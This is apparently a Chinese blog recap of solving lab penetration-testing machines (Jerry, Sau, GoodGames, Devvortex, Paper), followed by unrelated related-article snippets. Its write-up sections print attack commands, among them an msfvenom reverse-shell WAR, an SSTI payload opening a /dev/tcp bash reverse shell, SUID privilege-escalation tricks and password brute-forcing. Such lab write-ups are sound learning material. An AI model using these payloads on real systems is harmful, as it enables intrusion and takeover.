文章目录

  • jerry
  • Sau
  • GoodGames
  • devvotex
  • paper

最近打了不少靶场,虽然难度都不算高,但也学到不少东西,中间去打了一周的实网渗透,打完后联系了一家企业准备面试,感觉面试准备的差不多了,回来继续打靶,打之前复个小盘总结一下。

jerry

从jerry开始,学到tomcat类的服务器都自带管理后台,可以搜相关路径爆破密码,接下来学着部署war包实现上传木马的功能,

jar -cvf test.war "test.jsp"

并且如果连接不上,还可以用msf生成war包打反弹shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=43.155.67.230 LPORT=1234 -f war -o shell.war

接下来进去之后就拿到flag了,没有后续操作

Sau

接下来是sau,入口点在request baskets,就是一个流量转发工具,通过查找CVE达成了ssrf,获取80端口的访问权限。进来后同样截图丢给gpt,发现是maltrail,且存在未授权访问漏洞,利用网上下的脚本拿到shell,接下来准备提权,提权的过程比较简单,systemctl用于查看系统状态,又是suid权限,关键人自带的分页程序就是less,从这里学到一个骚技巧,就是长文本用less打提权

!/bin/bash

GoodGames

这个靶场入口点是sql注入,说实话我觉得这个漏洞在当下有点多余了,一个参数化查询就可以避免,但是不可否认的是它在当前的环境中确实还存在,所以有必要顺手测一测(大厂的产品除外)

接下来拿到了一个密码,md5解密,拿到管理员账号登录

没想到管理员登录后会有新的功能点(原来利用点在这啊

进去之后有一个修改资料页面,在这样的地方可以测一测ssti,通过ssti可以反弹shell

{{self.__init__.__globals__.__builtins__.__import__('os').popen("bash -c 'bash -i >& /dev/tcp/10.10.16.2/6666 0>&1'").read()}} 

反弹的shell不是真的终端,有一些功能限制,需要提升TTY

script -b /bin/bash -p /dev/null

进来之后发现root目录是空的,找不到flag,这里出现了比较震撼的一点,这玩意竟然是在docker里

先用ifconfig看看接口,发现主机ip,接着看看/etc/passwd,发现没有用户augus,但是home里有,说明可能是直接从主机挂载过来的(类似共享文件夹),查看挂载

mount | grep augustus

随后发现主机和挂载目录的权限共享,竟然可以主机建文件然后docker给它授权

bash从4.2开始会默认丢弃特权,-p参数保留有效uid和gid

devvotex

从这里开始学到虚拟主机技术,从HOST中添加域名字段爆破子域名

ffuf -u FUZZ.devvortex.htb -w /home/gw/桌面/test/fuzzDicts-master/subdomainDicts/main.txt -fc 302

进dev子域名后发现Joomla cms的未授权访问,拿到数据库中用户名和密码

进去之后接着搜漏洞去打拿shell,反弹shell如果msf打不通可以直接用curl命令

拿到hash密码后可以选择使用hashcat爆破或者在线网站解

hashcat -m 3200 -a 0 pass.txt /usr/share/wordlists/rockyou.txt --show

https://hashes.com/zh/decrypt/hash

进去之后借助less提权

paper

见到检测wordpress漏洞的工具wpscan,kali有自带的

枚举用户名

wpscan --url http://derpnstink.local/weblog -e u

爆破密码

wpscan --url http://office.paper -U prisonmike -P /home/gw/桌面/test/fuzzDicts-master/passwordDict/top500.txt

但这里思路歪了,对网站本身的信息收集不够,应该往未授权查看草稿的方向去打

进来之后发现是一个聊天室rocket,这里版本比较高,直接用现成的是打不通了,但是这个bot有点问题,可以利用其访问一些文件

拿到.env环境下的rocket配置,猜测跟ssh的密码是一样的,尝试登录

进去之后传脚本打cve提权

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.pswp.cn/pingmian/97801.shtml
繁体地址,请注明出处:http://hk.pswp.cn/pingmian/97801.shtml
英文地址,请注明出处:http://en.pswp.cn/pingmian/97801.shtml

如若内容造成侵权/违法违规/事实不符,请联系英文站点网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

云手机的技术架构可分为哪些

一、基础设施层为其提供计算、存储和网络资源,高性能的服务器 CPU 是关键,它需具备多核多线程处理能力,以同时支持多个云手机实例的运行,比如英特尔至强系列处理器,能够有效处理复杂的运算任务;通过虚拟化技…

[创业之路-585]:初创公司的保密安全与信息公开的效率提升

初创公司处于快速发展与资源有限的双重约束下,平衡保密安全与信息公开效率是生存与发展的关键。保密安全可保护核心资产(如技术、客户数据、商业计划),避免被竞争对手模仿或恶意攻击;而信息公开的效率则直接影响团队协…

如何在Docker容器中为Stimulsoft BI Server配置HTTPS安全访问

在 Stimulsoft BI Server 2025.3.1 版本中,新增了在 Docker 容器中运行 BI Server 的能力。本文将为大家介绍如何在容器环境中为 BI Server 配置 HTTPS 协议的数据传输,从而实现安全、加密的访问。 为什么需要 HTTPS? **HTTPS(S…

PPT中将图片裁剪为爱心等形状

在WPS演示和PowerPoint中,使用裁剪功能,可以将插入的图片裁剪为各种形状,例如心形、五角形、云朵形等等。WPS演示还可以指定裁剪的位置,更加灵活。一、在PowerPoint中裁剪图片为爱心等形状将图片插入到幻灯片后,选中图…

深入理解Docker网络:实现容器间的内部访问

目录一、利用宿主机 IP 外部端口实现容器互访1.思路2.示例操作3.访问测试4.工作原理5.总结二、Docker 容器之间的网络通信(docker0 与自定义桥接网络)1. docker0 简介2. 通过容器 IP 访问3. 自定义桥接网络(推荐方式)创建自定义网…

ESD静电保护二极管焊接时需要区分方向和极性吗?-深圳阿赛姆

ESD静电保护二极管焊接时需要区分方向和极性吗?一、ESD二极管极性概述1.1 单向与双向ESD二极管的基本区别ESD静电保护二极管根据其内部结构和工作原理可分为两种主要类型:单向ESD二极管(Unidirectional):具有明确的阳极…

Qt QML Switch和SwitchDelegate的区别?

在 Qt QML 中,Switch和 SwitchDelegate主要区别体现在定位、使用场景和功能特性上。以下是具体分析:​1. 核心定位​​Switch​:是一个基础的独立交互控件​(继承自 ToggleButton),用于直接提供“开/关”&a…

no module name ‘kaolin‘

如果报错 no module named xxx 一般是没安装这个库,但是各种邪修安装了kaolin之后,还是报错,这个报错的核心信息是: ImportError: .../kaolin/_C.so: undefined symbol: _ZN3c104cuda20CUDACachingAllocator9allocatorE意思是 Ka…

OBS使用教程:OBS歌曲显示插件如何下载?如何安装使用?

OBS使用教程:OBS歌曲显示插件如何下载?如何安装使用? 第一步:下载OBS歌曲显示插件,并完成安装 OBS歌曲显示插件下载地址①: https://d.obscj.com/obs-Setup_BGM.exe OBS歌曲显示插件下载地址②&#xf…

基于 Java EE+MySQL+Dart 实现多平台应用的音乐共享社区

基于多平台应用的音乐共享社区 1 绪论 1.1 课题依据及意义 随着互联网娱乐项目的日益增多,内容也日渐丰富,加之网络便利性的增强,越来越多的用户喜欢在网上听音乐。但是各平台音乐资源残次不齐,也包含了许多假无损音乐&#xf…

贪心算法在物联网能耗优化中的应用

Java中的贪心算法在物联网能耗优化中的应用 贪心算法是一种在每一步选择中都采取当前状态下最优决策的算法策略,它在物联网(IoT)能耗优化问题中有着广泛的应用。下面我将全面详细地讲解如何使用Java实现贪心算法来解决物联网中的能耗优化问题。 一、物联网能耗优化问…

59.【.NET8 实战--孢子记账--从单体到微服务--转向微服务】--新增功能--MinIO对象存储服务

在孢子记账中我们需要存储用户的头像、账单的图片等文件,这些文件的存储我们可以使用MinIO对象存储服务, MinIO提供了高性能、可扩展的对象存储解决方案,能够帮助我们轻松管理这些文件资源。通过MinIO,我们可以将用户上传的图片文…

ESP32三种主流的开发环境

ESP32三种主流的开发环境 1. ESP-IDF (Espressif IoT Development Framework) 这是乐鑫官方提供的专业开发框架,基于FreeRTOS实时操作系统。 特点: 功能最全面,性能最优支持所有ESP32硬件特性使用C/C编程专业级调试工具完整的组件库和API 适合…

HarmonyOS图形处理:Canvas绘制与动画开发实战

本文将全面介绍HarmonyOS 5中Canvas组件的使用方法和动画开发技巧,通过详细的代码示例和最佳实践,帮助您掌握图形绘制和动态效果实现的核心技能。 1. Canvas组件基础与核心API Canvas是HarmonyOS中用于2D图形绘制的重要组件,提供了丰富的绘图…

CCAFusion:用于红外与可见光图像融合的跨模态坐标注意力网络

CCAFusion:用于红外与可见光图像融合的跨模态坐标注意力网络 CCAFusion: Cross-Modal Coordinate Attention Network for Infrared and Visible Image Fusion 摘要 红外与可见光图像融合旨在生成一幅包含全面信息的图像,该图像既能保留丰富的纹理特征&a…

ESP32-P4小智编译历险记:从“编译失败“到“成功烧录“的奇幻之旅,xiaozhi智能聊天机器人编译避坑心得

🚀 ESP32-P4:AI小智编译历险记:从"编译失败"到"成功烧录"的奇幻之旅 要编译其他芯片esp32s3-s2-c3,遇到问题也可以在这里交流 “每一个编译错误都是成长的机会,每一次成功都是坚持的胜利!” —— 某位被编译器折磨的程序员 源码地址:https://githu…

DIFY 项目中通过 Makefile 调用 Dockerfile 并使用 sudo make build-web 命令构建 web 镜像的方法和注意事项

DIFY 项目中通过 Makefile 调用 Dockerfile 并使用 sudo make build-web 命令构建 web 镜像的场景,以下是具体方法和注意事项总结: 一、通过 sudo make build-web 构建 web 镜像的核心方法 1. 理解 Makefile 与 Dockerfile 的关联 Makefile 的作用:DIFY 的 Makefile 中定义…

重学前端015 --- 响应式网页设计 CSS变换

文章目录skew()transformcursortransition.arm .left {} 和 .arm.left {} 区别skew() skew 倾斜变换函数,该函数有两个参数。第一个是剪切x轴的角度,第二个是剪切y轴的角度。 transform: skew(0deg, 44deg);transform .arm.left {top: 35%;left: 5%;t…

【GMX v1实战】时序风险结算与资本成本:深度解析 GMX 永续合约的资金费率机制

在去中心化衍生品交易平台GMX中,当你准备开立杠杆合约仓位(无论是做多还是做空某个资产)时,系统会默默执行一个关键前置动作——调用名为 ​​updateCumulativeFundingRate​​ 的函数。这个看似普通的“准备工作”,实…

中宇联云计算SD-WAN的售后服务怎么样

前言在数字化转型浪潮中,企业选择SD-WAN服务商不仅关注技术性能,更看重售后服务的质量与可靠性。中宇联云计算作为行业领先者,其SD-WAN售后服务体系已成为行业标杆。随着全球数字化进程加速,企业对广域网(WAN&#xff…